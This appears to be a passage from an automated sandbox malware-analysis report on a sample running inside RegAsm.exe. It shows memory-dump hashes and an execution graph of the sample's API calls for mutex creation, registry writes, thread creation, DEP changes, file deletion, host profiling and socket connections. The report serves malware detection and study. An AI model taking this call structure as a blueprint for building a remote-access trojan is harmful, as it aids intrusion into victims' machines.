                                    • Instruction Fuzzy Hash: D321CF74A01206DFDB15EF38C51466E77F6AFC8304F2444ADD80AAB395DB369D02CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 4d3451c1f7ab73381e860bb2d2182e80f28f1a3a6746d7f4478a66374b11be68
                                    • Instruction ID: aeb2ffda5691b4c1b1f2c4428dba4223976e9be1292125bdff447b92efb96653
                                    • Opcode Fuzzy Hash: 4d3451c1f7ab73381e860bb2d2182e80f28f1a3a6746d7f4478a66374b11be68
                                    • Instruction Fuzzy Hash: 5E117C7060120ADFDB15EB79D51466E37FABFC8304F244868D406AB399DF359D01CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq
                                    • API String ID: 0-725504367
                                    • Opcode ID: 7c9bfdeffd7cb3dfc29d95b1d84c3e47cc78c46b627070634d14a8f22b9d08ae
                                    • Instruction ID: 16cda3f5e699290116732817ca2a695e614f37ad5ff39fe829726d1026eb1df1
                                    • Opcode Fuzzy Hash: 7c9bfdeffd7cb3dfc29d95b1d84c3e47cc78c46b627070634d14a8f22b9d08ae
                                    • Instruction Fuzzy Hash: 87F0AF307082614FC349AB7E985445E3FE7FFDA26031644FAD149CB3A6DE688C06C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b1149ec828b466824169295de201cf42e84155ba5cb6047312a0d77540cb658
                                    • Instruction ID: 444f8db9acae693028d26da87b59fe3d194308cbae05aa50e9ee9703f7851184
                                    • Opcode Fuzzy Hash: 1b1149ec828b466824169295de201cf42e84155ba5cb6047312a0d77540cb658
                                    • Instruction Fuzzy Hash: 9E51F83850020BDFCB5AEF34F5689693B7AFFC4315714856AD8058B26CEB35A94ACF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 630b7a7f98cfea17333f263eae4b85f969aca1daf3ee2b41658d3ee3d18c70ae
                                    • Instruction ID: 7a945833a8c3773bfc1605432f6935c045b28857ea453e93fff9147819b28b19
                                    • Opcode Fuzzy Hash: 630b7a7f98cfea17333f263eae4b85f969aca1daf3ee2b41658d3ee3d18c70ae
                                    • Instruction Fuzzy Hash: 793141347202469FFB6DAB79F85C23A3AE9FF9424D7044629B807CA155EB30C542CB69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6013eb4cde860fa16b1cf2d46cacda27d789e8eff48937e08aac9f03bb27dd44
                                    • Instruction ID: e20846041cf756d6820732f49dbccb79712251c2cf9a6163950056103bdef9e0
                                    • Opcode Fuzzy Hash: 6013eb4cde860fa16b1cf2d46cacda27d789e8eff48937e08aac9f03bb27dd44
                                    • Instruction Fuzzy Hash: A93153347202479FFB6DAB79F41C23E3AE9AF8424D7044629B907CA155EF30C502CB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078028258.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_12dd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 084b226606dfa7b8a0a7efd39846d4ece4d6f76e86cce1bb91b4f8786145d04e
                                    • Instruction ID: c585997cc718a337880801e9f609478a6e68a969293862a6973a6a328e191dd7
                                    • Opcode Fuzzy Hash: 084b226606dfa7b8a0a7efd39846d4ece4d6f76e86cce1bb91b4f8786145d04e
                                    • Instruction Fuzzy Hash: E1216771510648DFCB05CF98D9C0F66BF65FB84324F20C56DE9090B296C33AE446CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078028258.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_12dd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:5.1%
                                    Total number of Nodes:1311
                                    Total number of Limit Nodes:37
47406->47796 48014 407260 98 API calls 47410->48014 47412 401f09 11 API calls 47414 40f39c 47412->47414 47417 401f09 11 API calls 47414->47417 47419 40f3a5 47417->47419 47418 401e65 22 API calls 47420 40ecc1 47418->47420 47900 40dd42 47419->47900 47424 401e65 22 API calls 47420->47424 47426 40ecdb 47424->47426 47425 40f3af 47427 401e65 22 API calls 47426->47427 47428 40ecf5 47427->47428 47429 401e65 22 API calls 47428->47429 47430 40ed0e 47429->47430 47431 401e65 22 API calls 47430->47431 47462 40ed7b 47430->47462 47437 40ed23 _wcslen 47431->47437 47432 40ed8a 47433 40ed93 47432->47433 47458 40ee0f ___scrt_get_show_window_mode 47432->47458 47434 401e65 22 API calls 47433->47434 47436 40ed9c 47434->47436 47435 40ef06 ___scrt_get_show_window_mode 48076 4136f8 RegOpenKeyExA 47435->48076 47438 401e65 22 API calls 47436->47438 47439 401e65 22 API calls 47437->47439 47437->47462 47440 40edae 47438->47440 47441 40ed3e 47439->47441 47443 401e65 22 API calls 47440->47443 47445 401e65 22 API calls 47441->47445 47444 40edc0 47443->47444 47448 401e65 22 API calls 47444->47448 47446 40ed53 47445->47446 48016 40da34 47446->48016 47447 40ef51 47449 401e65 22 API calls 47447->47449 47451 40ede9 47448->47451 47452 40ef76 47449->47452 47456 401e65 22 API calls 47451->47456 47818 402093 47452->47818 47454 401f13 28 API calls 47455 40ed72 47454->47455 47459 401f09 11 API calls 47455->47459 47460 40edfa 47456->47460 47808 413947 47458->47808 47459->47462 48074 40cdf9 45 API calls _wcslen 47460->48074 47461 40ef88 47824 41376f RegCreateKeyA 47461->47824 47462->47432 47462->47435 47467 40eea3 ctype 47471 401e65 22 API calls 47467->47471 47468 40ee0a 47468->47458 47469 401e65 22 API calls 47470 40efaa 47469->47470 47830 43baac 47470->47830 47472 40eeba 47471->47472 47472->47447 47475 40eece 47472->47475 47477 401e65 22 API calls 47475->47477 47476 40efc1 48079 41cd9b 87 API calls ___scrt_get_show_window_mode 47476->48079 47479 40eed7 47477->47479 47478 40efe4 47481 402093 28 API calls 
47478->47481 47482 41bc5e 28 API calls 47479->47482 47484 40eff9 47481->47484 47485 40eee3 47482->47485 47483 40efc8 CreateThread 47483->47478 48926 41d45d 10 API calls 47483->48926 47486 402093 28 API calls 47484->47486 48075 40f474 104 API calls 47485->48075 47488 40f008 47486->47488 47834 41b4ef 47488->47834 47489 40eee8 47489->47447 47491 40eeef 47489->47491 47491->47373 47493 401e65 22 API calls 47494 40f019 47493->47494 47495 401e65 22 API calls 47494->47495 47496 40f02b 47495->47496 47497 401e65 22 API calls 47496->47497 47498 40f04b 47497->47498 47499 43baac _strftime 40 API calls 47498->47499 47500 40f058 47499->47500 47501 401e65 22 API calls 47500->47501 47502 40f063 47501->47502 47503 401e65 22 API calls 47502->47503 47504 40f074 47503->47504 47505 401e65 22 API calls 47504->47505 47506 40f089 47505->47506 47507 401e65 22 API calls 47506->47507 47508 40f09a 47507->47508 47509 40f0a1 StrToIntA 47508->47509 47858 409de4 47509->47858 47512 401e65 22 API calls 47513 40f0bc 47512->47513 47514 40f101 47513->47514 47515 40f0c8 47513->47515 47517 401e65 22 API calls 47514->47517 48080 4344ea 47515->48080 47519 40f111 47517->47519 47523 40f159 47519->47523 47524 40f11d 47519->47524 47520 401e65 22 API calls 47521 40f0e4 47520->47521 47522 40f0eb CreateThread 47521->47522 47522->47514 48923 419fb4 103 API calls 2 library calls 47522->48923 47525 401e65 22 API calls 47523->47525 47526 4344ea new 22 API calls 47524->47526 47527 40f162 47525->47527 47528 40f126 47526->47528 47531 40f1cc 47527->47531 47532 40f16e 47527->47532 47529 401e65 22 API calls 47528->47529 47530 40f138 47529->47530 47535 40f13f CreateThread 47530->47535 47533 401e65 22 API calls 47531->47533 47534 401e65 22 API calls 47532->47534 47536 40f1d5 47533->47536 47537 40f17e 47534->47537 47535->47523 48928 419fb4 103 API calls 2 library calls 47535->48928 47538 40f1e1 47536->47538 47539 40f21a 47536->47539 47540 401e65 22 API calls 47537->47540 47542 401e65 22 API calls 47538->47542 47883 41b60d 
GetComputerNameExW GetUserNameW 47539->47883 47543 40f193 47540->47543 47545 40f1ea 47542->47545 48087 40d9e8 31 API calls 47543->48087 47550 401e65 22 API calls 47545->47550 47546 401f13 28 API calls 47547 40f22e 47546->47547 47549 401f09 11 API calls 47547->47549 47553 40f237 47549->47553 47554 40f1ff 47550->47554 47551 40f1a6 47552 401f13 28 API calls 47551->47552 47555 40f1b2 47552->47555 47556 40f240 SetProcessDEPPolicy 47553->47556 47557 40f243 CreateThread 47553->47557 47563 43baac _strftime 40 API calls 47554->47563 47558 401f09 11 API calls 47555->47558 47556->47557 47559 40f264 47557->47559 47560 40f258 CreateThread 47557->47560 48896 40f7a7 47557->48896 47564 40f1bb CreateThread 47558->47564 47561 40f279 47559->47561 47562 40f26d CreateThread 47559->47562 47560->47559 48924 4120f7 138 API calls 47560->48924 47566 40f2cc 47561->47566 47568 402093 28 API calls 47561->47568 47562->47561 48925 4126db 38 API calls ___scrt_get_show_window_mode 47562->48925 47565 40f20c 47563->47565 47564->47531 48927 401be9 50 API calls _strftime 47564->48927 48088 40c162 7 API calls 47565->48088 47894 4134ff RegOpenKeyExA 47566->47894 47569 40f29c 47568->47569 48089 4052fd 28 API calls 47569->48089 47574 40f2ed 47576 41bc5e 28 API calls 47574->47576 47578 40f2fd 47576->47578 48090 41361b 31 API calls 47578->48090 47583 40f313 47584 401f09 11 API calls 47583->47584 47587 40f31e 47584->47587 47585 40f346 DeleteFileW 47586 40f34d 47585->47586 47585->47587 47586->47394 47587->47394 47587->47585 47588 40f334 Sleep 47587->47588 47588->47587 47589->47267 47590->47271 47591->47276 47592->47274 47593->47284 47594->47285 47595->47287 47596->47290 47597->47294 47598->47296 47603 44fb68 47599->47603 47602 438f5a 8 API calls 3 library calls 47602->47301 47604 44fb85 47603->47604 47607 44fb81 47603->47607 47604->47607 47609 449ca6 47604->47609 47606 4345bd 47606->47299 47606->47602 47621 434fcb 47607->47621 47610 449cb2 ___scrt_is_nonwritable_in_current_image 47609->47610 47628 445888 
EnterCriticalSection 47610->47628 47612 449cb9 47629 450183 47612->47629 47614 449cc8 47615 449cd7 47614->47615 47640 449b3a 23 API calls 47614->47640 47642 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47615->47642 47618 449cd2 47641 449bf0 GetStdHandle GetFileType 47618->47641 47619 449ce8 ___scrt_is_nonwritable_in_current_image 47619->47604 47622 434fd6 IsProcessorFeaturePresent 47621->47622 47623 434fd4 47621->47623 47625 435018 47622->47625 47623->47606 47670 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47625->47670 47627 4350fb 47627->47606 47628->47612 47630 45018f ___scrt_is_nonwritable_in_current_image 47629->47630 47631 4501b3 47630->47631 47632 45019c 47630->47632 47643 445888 EnterCriticalSection 47631->47643 47651 4405dd 20 API calls _Atexit 47632->47651 47635 4501eb 47652 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47635->47652 47636 4501bf 47636->47635 47644 4500d4 47636->47644 47638 4501a1 ___scrt_is_nonwritable_in_current_image _Atexit 47638->47614 47640->47618 47641->47615 47642->47619 47643->47636 47653 445af3 47644->47653 47646 4500f3 47660 446782 47646->47660 47649 450145 47649->47636 47650 4500e6 47650->47646 47666 448a84 11 API calls 2 library calls 47650->47666 47651->47638 47652->47638 47658 445b00 ___crtLCMapStringA 47653->47658 47654 445b40 47668 4405dd 20 API calls _Atexit 47654->47668 47655 445b2b RtlAllocateHeap 47657 445b3e 47655->47657 47655->47658 47657->47650 47658->47654 47658->47655 47667 442f80 7 API calls 2 library calls 47658->47667 47661 44678d RtlFreeHeap 47660->47661 47662 4467b6 _free 47660->47662 47661->47662 47663 4467a2 47661->47663 47662->47649 47669 4405dd 20 API calls _Atexit 47663->47669 47665 4467a8 GetLastError 47665->47662 47666->47650 47667->47658 47668->47657 47669->47665 47670->47627 47672 434b27 GetStartupInfoW 47671->47672 47672->47305 47674 44f06b 47673->47674 47675 44f062 47673->47675 47674->47309 47678 44ef58 49 API calls 4 library calls 
47675->47678 47677->47309 47678->47674 47680 41cb8f LoadLibraryA GetProcAddress 47679->47680 47681 41cb7f GetModuleHandleA GetProcAddress 47679->47681 47682 41cbb8 44 API calls 47680->47682 47683 41cba8 LoadLibraryA GetProcAddress 47680->47683 47681->47680 47682->47313 47683->47682 48093 41b4a8 FindResourceA 47684->48093 47688 40f3ed ctype 48103 4020b7 47688->48103 47691 401fe2 28 API calls 47692 40f413 47691->47692 47693 401fd8 11 API calls 47692->47693 47694 40f41c 47693->47694 47695 43bd51 new 21 API calls 47694->47695 47696 40f42d ctype 47695->47696 48109 406dd8 47696->48109 47698 40f460 47698->47315 47700 40210c 47699->47700 47701 4023ce 11 API calls 47700->47701 47702 402126 47701->47702 47703 402569 28 API calls 47702->47703 47704 402134 47703->47704 47704->47318 48163 4020df 47705->48163 47707 41be2e 47710 41bea0 47707->47710 47718 401fe2 28 API calls 47707->47718 47722 401fd8 11 API calls 47707->47722 47726 41be9e 47707->47726 48167 4041a2 47707->48167 48170 41ce34 47707->48170 47708 401fd8 11 API calls 47709 41bed0 47708->47709 47711 401fd8 11 API calls 47709->47711 47712 4041a2 28 API calls 47710->47712 47714 41bed8 47711->47714 47715 41beac 47712->47715 47716 401fd8 11 API calls 47714->47716 47717 401fe2 28 API calls 47715->47717 47719 40ea24 47716->47719 47720 41beb5 47717->47720 47718->47707 47727 40fb17 47719->47727 47721 401fd8 11 API calls 47720->47721 47723 41bebd 47721->47723 47722->47707 47724 41ce34 28 API calls 47723->47724 47724->47726 47726->47708 47728 40fb23 47727->47728 47730 40fb2a 47727->47730 48212 402163 11 API calls 47728->48212 47730->47323 47732 402163 47731->47732 47736 40219f 47732->47736 48213 402730 11 API calls 47732->48213 47734 402184 48214 402712 11 API calls std::_Deallocate 47734->48214 47736->47325 47738 401e6d 47737->47738 47739 401e75 47738->47739 48215 402158 22 API calls 47738->48215 47739->47330 47743 4020df 11 API calls 47742->47743 47744 40532a 47743->47744 48216 4032a0 47744->48216 47746 405346 47746->47338 48220 
4051ef 47747->48220 47749 406391 48224 402055 47749->48224 47752 401fe2 47753 401ff1 47752->47753 47760 402039 47752->47760 47754 4023ce 11 API calls 47753->47754 47755 401ffa 47754->47755 47756 40203c 47755->47756 47758 402015 47755->47758 47757 40267a 11 API calls 47756->47757 47757->47760 48256 403098 28 API calls 47758->48256 47761 401fd8 47760->47761 47762 4023ce 11 API calls 47761->47762 47763 401fe1 47762->47763 47763->47350 47765 401fd2 47764->47765 47766 401fc9 47764->47766 47765->47356 48257 4025e0 28 API calls 47766->48257 48258 401fab 47768->48258 47770 40d073 CreateMutexA GetLastError 47770->47372 48259 41bfb7 47771->48259 47776 401fe2 28 API calls 47777 41b2ff 47776->47777 47778 401fd8 11 API calls 47777->47778 47779 41b307 47778->47779 47780 4135a6 31 API calls 47779->47780 47782 41b35d 47779->47782 47781 41b330 47780->47781 47783 41b33b StrToIntA 47781->47783 47782->47379 47784 41b349 47783->47784 47787 41b352 47783->47787 48267 41cf69 22 API calls 47784->48267 47786 401fd8 11 API calls 47786->47782 47787->47786 47789 40772a 47788->47789 47790 413549 3 API calls 47789->47790 47791 407731 47790->47791 47791->47389 47791->47390 47793 41bc72 47792->47793 48268 40b904 47793->48268 47795 41bc7a 47795->47406 47797 401f22 47796->47797 47798 401f6a 47796->47798 47799 402252 11 API calls 47797->47799 47805 401f09 47798->47805 47800 401f2b 47799->47800 47801 401f6d 47800->47801 47802 401f46 47800->47802 48301 402336 47801->48301 48300 40305c 28 API calls 47802->48300 47806 402252 11 API calls 47805->47806 47807 401f12 47806->47807 47807->47418 47809 413965 47808->47809 47810 406dd8 28 API calls 47809->47810 47811 41397a 47810->47811 47812 4020f6 28 API calls 47811->47812 47813 41398a 47812->47813 47814 41376f 14 API calls 47813->47814 47815 413994 47814->47815 47816 401fd8 11 API calls 47815->47816 47817 4139a1 47816->47817 47817->47467 47819 40209b 47818->47819 47820 4023ce 11 API calls 47819->47820 47821 4020a6 47820->47821 48305 4024ed 47821->48305 47825 
4137bf 47824->47825 47828 413788 47824->47828 47826 401fd8 11 API calls 47825->47826 47827 40ef9e 47826->47827 47827->47469 47829 41379a RegSetValueExA RegCloseKey 47828->47829 47829->47825 47831 43bac5 _strftime 47830->47831 48309 43ae03 47831->48309 47833 40efb7 47833->47476 47833->47478 47835 41b5a0 47834->47835 47836 41b505 GetLocalTime 47834->47836 47838 401fd8 11 API calls 47835->47838 47837 40531e 28 API calls 47836->47837 47839 41b547 47837->47839 47840 41b5a8 47838->47840 47842 406383 28 API calls 47839->47842 47841 401fd8 11 API calls 47840->47841 47843 40f00d 47841->47843 47844 41b553 47842->47844 47843->47493 48337 402f10 47844->48337 47847 406383 28 API calls 47848 41b56b 47847->47848 48342 407200 77 API calls 47848->48342 47850 41b579 47851 401fd8 11 API calls 47850->47851 47852 41b585 47851->47852 47853 401fd8 11 API calls 47852->47853 47854 41b58e 47853->47854 47855 401fd8 11 API calls 47854->47855 47856 41b597 47855->47856 47857 401fd8 11 API calls 47856->47857 47857->47835 47859 409e02 _wcslen 47858->47859 47860 409e24 47859->47860 47861 409e0d 47859->47861 47863 40da34 31 API calls 47860->47863 47862 40da34 31 API calls 47861->47862 47864 409e15 47862->47864 47865 409e2c 47863->47865 47867 401f13 28 API calls 47864->47867 47866 401f13 28 API calls 47865->47866 47868 409e3a 47866->47868 47882 409e1f 47867->47882 47869 401f09 11 API calls 47868->47869 47870 409e42 47869->47870 48361 40915b 28 API calls 47870->48361 47871 401f09 11 API calls 47873 409e79 47871->47873 48346 40a109 47873->48346 47874 409e54 48362 403014 47874->48362 47879 401f13 28 API calls 47880 409e69 47879->47880 47881 401f09 11 API calls 47880->47881 47881->47882 47882->47871 48414 40417e 47883->48414 47888 403014 28 API calls 47889 41b672 47888->47889 47890 401f09 11 API calls 47889->47890 47891 41b67b 47890->47891 47892 401f09 11 API calls 47891->47892 47893 40f223 47892->47893 47893->47546 47895 413520 RegQueryValueExA RegCloseKey 47894->47895 47896 40f2e4 47894->47896 
47895->47896 47896->47419 47896->47574 47898 40f392 47897->47898 47899 413a3f RegDeleteValueW 47897->47899 47898->47412 47899->47898 47901 40dd5b 47900->47901 47902 4134ff 3 API calls 47901->47902 47903 40dd62 47902->47903 47907 40dd81 47903->47907 48506 401707 47903->48506 47905 40dd6f 48509 413877 RegCreateKeyA 47905->48509 47908 414f2a 47907->47908 47909 4020df 11 API calls 47908->47909 47910 414f3e 47909->47910 48523 41b8b3 47910->48523 47913 4020df 11 API calls 47914 414f54 47913->47914 47915 401e65 22 API calls 47914->47915 47916 414f62 47915->47916 47917 43baac _strftime 40 API calls 47916->47917 47918 414f6f 47917->47918 47919 414f81 47918->47919 47920 414f74 Sleep 47918->47920 47921 402093 28 API calls 47919->47921 47920->47919 47922 414f90 47921->47922 47923 401e65 22 API calls 47922->47923 47924 414f99 47923->47924 47925 4020f6 28 API calls 47924->47925 47926 414fa4 47925->47926 47927 41be1b 28 API calls 47926->47927 47928 414fac 47927->47928 48527 40489e WSAStartup 47928->48527 47930 414fb6 47931 401e65 22 API calls 47930->47931 47932 414fbf 47931->47932 47933 401e65 22 API calls 47932->47933 47993 41503e 47932->47993 47934 414fd8 47933->47934 47935 401e65 22 API calls 47934->47935 47936 414fe9 47935->47936 47938 401e65 22 API calls 47936->47938 47937 41be1b 28 API calls 47937->47993 47940 414ffa 47938->47940 47939 401e65 22 API calls 47939->47993 47942 401e65 22 API calls 47940->47942 47941 406c1e 28 API calls 47941->47993 47943 41500b 47942->47943 47945 401e65 22 API calls 47943->47945 47944 401fe2 28 API calls 47944->47993 47946 41501c 47945->47946 47947 401e65 22 API calls 47946->47947 47948 41502e 47947->47948 48688 40473d 89 API calls 47948->48688 47950 402093 28 API calls 47950->47993 47951 41b4ef 80 API calls 47951->47993 47953 41518c WSAGetLastError 48689 41cae1 30 API calls 47953->48689 47958 41519c 47960 41b4ef 80 API calls 47958->47960 47963 401e65 22 API calls 47958->47963 47964 401e8d 11 API calls 47958->47964 47965 43baac _strftime 40 API 
calls 47958->47965 47958->47993 47995 402093 28 API calls 47958->47995 47996 415a71 CreateThread 47958->47996 47997 401fd8 11 API calls 47958->47997 47998 401f09 11 API calls 47958->47998 48690 4052fd 28 API calls 47958->48690 48691 40b051 85 API calls 47958->48691 48692 404e26 99 API calls 47958->48692 47960->47958 47962 40531e 28 API calls 47962->47993 47963->47958 47964->47958 47967 415acf Sleep 47965->47967 47966 406383 28 API calls 47966->47993 47967->47958 47970 40905c 28 API calls 47970->47993 47972 4020f6 28 API calls 47972->47993 47973 4136f8 3 API calls 47973->47993 47974 4135a6 31 API calls 47974->47993 47975 40417e 28 API calls 47975->47993 47978 401e65 22 API calls 47979 415439 GetTickCount 47978->47979 48635 41bb8e 47979->48635 47982 41bb8e 28 API calls 47982->47993 47984 41bd1e 28 API calls 47984->47993 47987 402f10 28 API calls 47987->47993 47988 402ea1 28 API calls 47988->47993 47990 401fd8 11 API calls 47990->47993 47991 401f09 11 API calls 47991->47993 47993->47937 47993->47939 47993->47941 47993->47944 47993->47950 47993->47951 47993->47953 47993->47958 47993->47962 47993->47966 47993->47970 47993->47972 47993->47973 47993->47974 47993->47975 47993->47978 47993->47982 47993->47984 47993->47987 47993->47988 47993->47990 47993->47991 48528 414ee9 47993->48528 48534 40482d 47993->48534 48541 404f51 47993->48541 48556 4048c8 connect 47993->48556 48616 41b7e0 47993->48616 48619 4145bd 47993->48619 48622 441e81 47993->48622 48626 40dd89 47993->48626 48632 41bc42 47993->48632 48640 41bae6 47993->48640 48642 41ba96 47993->48642 48647 40f8d1 GetLocaleInfoA 47993->48647 48650 402f31 47993->48650 48655 404aa1 47993->48655 48670 404c10 47993->48670 47995->47958 47996->47958 48882 41ad17 105 API calls 47996->48882 47997->47958 47998->47958 47999->47331 48000->47339 48001->47343 48004 4020df 11 API calls 48003->48004 48005 406c2a 48004->48005 48006 4032a0 28 API calls 48005->48006 48007 406c47 48006->48007 48007->47364 48009 40eba4 48008->48009 48010 413573 
RegQueryValueExA RegCloseKey 48008->48010 48009->47361 48009->47378 48010->48009 48011->47367 48012->47397 48013->47390 48014->47382 48015->47395 48883 401f86 48016->48883 48019 40da70 48887 41b5b4 29 API calls 48019->48887 48020 40daa5 48024 41bfb7 GetCurrentProcess 48020->48024 48022 40da66 48023 40db99 GetLongPathNameW 48022->48023 48026 40417e 28 API calls 48023->48026 48027 40daaa 48024->48027 48025 40da79 48028 401f13 28 API calls 48025->48028 48029 40dbae 48026->48029 48030 40db00 48027->48030 48031 40daae 48027->48031 48032 40da83 48028->48032 48033 40417e 28 API calls 48029->48033 48034 40417e 28 API calls 48030->48034 48035 40417e 28 API calls 48031->48035 48039 401f09 11 API calls 48032->48039 48036 40dbbd 48033->48036 48037 40db0e 48034->48037 48038 40dabc 48035->48038 48890 40ddd1 28 API calls 48036->48890 48042 40417e 28 API calls 48037->48042 48043 40417e 28 API calls 48038->48043 48039->48022 48041 40dbd0 48891 402fa5 28 API calls 48041->48891 48045 40db24 48042->48045 48046 40dad2 48043->48046 48889 402fa5 28 API calls 48045->48889 48888 402fa5 28 API calls 48046->48888 48047 40dbdb 48892 402fa5 28 API calls 48047->48892 48051 40dbe5 48054 401f09 11 API calls 48051->48054 48052 40db2f 48055 401f13 28 API calls 48052->48055 48053 40dadd 48056 401f13 28 API calls 48053->48056 48057 40dbef 48054->48057 48058 40db3a 48055->48058 48059 40dae8 48056->48059 48060 401f09 11 API calls 48057->48060 48061 401f09 11 API calls 48058->48061 48062 401f09 11 API calls 48059->48062 48063 40dbf8 48060->48063 48064 40db43 48061->48064 48065 40daf1 48062->48065 48066 401f09 11 API calls 48063->48066 48067 401f09 11 API calls 48064->48067 48068 401f09 11 API calls 48065->48068 48069 40dc01 48066->48069 48067->48032 48068->48032 48070 401f09 11 API calls 48069->48070 48071 40dc0a 48070->48071 48072 401f09 11 API calls 48071->48072 48073 40dc13 48072->48073 48073->47454 48074->47468 48075->47489 48077 41371e RegQueryValueExA RegCloseKey 48076->48077 48078 413742 
48076->48078 48077->48078 48078->47447 48079->47483 48084 4344ef 48080->48084 48081 43bd51 new 21 API calls 48081->48084 48082 40f0d1 48082->47520 48084->48081 48084->48082 48893 442f80 7 API calls 2 library calls 48084->48893 48894 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48894 48895 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48084->48895 48087->47551 48088->47539 48090->47583 48091->47388 48094 41b4c5 LoadResource LockResource SizeofResource 48093->48094 48095 40f3de 48093->48095 48094->48095 48096 43bd51 48095->48096 48101 446137 ___crtLCMapStringA 48096->48101 48097 446175 48113 4405dd 20 API calls _Atexit 48097->48113 48098 446160 RtlAllocateHeap 48100 446173 48098->48100 48098->48101 48100->47688 48101->48097 48101->48098 48112 442f80 7 API calls 2 library calls 48101->48112 48104 4020bf 48103->48104 48114 4023ce 48104->48114 48106 4020ca 48118 40250a 48106->48118 48108 4020d9 48108->47691 48110 4020b7 28 API calls 48109->48110 48111 406dec 48110->48111 48111->47698 48112->48101 48113->48100 48115 402428 48114->48115 48116 4023d8 48114->48116 48115->48106 48116->48115 48125 4027a7 11 API calls std::_Deallocate 48116->48125 48119 40251a 48118->48119 48120 402520 48119->48120 48121 402535 48119->48121 48126 402569 48120->48126 48136 4028e8 48121->48136 48124 402533 48124->48108 48125->48115 48147 402888 48126->48147 48128 40257d 48129 402592 48128->48129 48130 4025a7 48128->48130 48152 402a34 22 API calls 48129->48152 48132 4028e8 28 API calls 48130->48132 48135 4025a5 48132->48135 48133 40259b 48153 4029da 22 API calls 48133->48153 48135->48124 48137 4028f1 48136->48137 48138 402953 48137->48138 48139 4028fb 48137->48139 48161 4028a4 22 API calls 48138->48161 48142 402904 48139->48142 48143 402917 48139->48143 48155 402cae 48142->48155 48144 402915 48143->48144 48146 4023ce 11 API calls 48143->48146 48144->48124 48146->48144 48148 402890 48147->48148 48149 402898 48148->48149 48154 
402ca3 22 API calls 48148->48154 48149->48128 48152->48133 48153->48135 48156 402cb8 __EH_prolog 48155->48156 48162 402e54 22 API calls 48156->48162 48158 4023ce 11 API calls 48160 402d92 48158->48160 48159 402d24 48159->48158 48160->48144 48162->48159 48164 4020e7 48163->48164 48165 4023ce 11 API calls 48164->48165 48166 4020f2 48165->48166 48166->47707 48181 40423a 48167->48181 48171 41ce41 48170->48171 48172 41cea0 48171->48172 48176 41ce51 48171->48176 48173 41ceba 48172->48173 48174 41cfe0 28 API calls 48172->48174 48196 41d146 28 API calls 48173->48196 48174->48173 48177 41ce89 48176->48177 48187 41cfe0 48176->48187 48195 41d146 28 API calls 48177->48195 48178 41ce9c 48178->47707 48182 404243 48181->48182 48183 4023ce 11 API calls 48182->48183 48184 40424e 48183->48184 48185 402569 28 API calls 48184->48185 48186 4041b5 48185->48186 48186->47707 48189 41cfe8 48187->48189 48188 41d01a 48188->48177 48189->48188 48190 41d01e 48189->48190 48193 41d002 48189->48193 48207 402725 22 API calls 48190->48207 48197 41d051 48193->48197 48195->48178 48196->48178 48198 41d05b __EH_prolog 48197->48198 48208 402717 22 API calls 48198->48208 48200 41d06e 48209 41d15d 11 API calls 48200->48209 48202 41d094 48203 41d0cc 48202->48203 48210 402730 11 API calls 48202->48210 48203->48188 48205 41d0b3 48211 402712 11 API calls std::_Deallocate 48205->48211 48208->48200 48209->48202 48210->48205 48211->48203 48212->47730 48213->47734 48214->47736 48218 4032aa 48216->48218 48217 4032c9 48217->47746 48218->48217 48219 4028e8 28 API calls 48218->48219 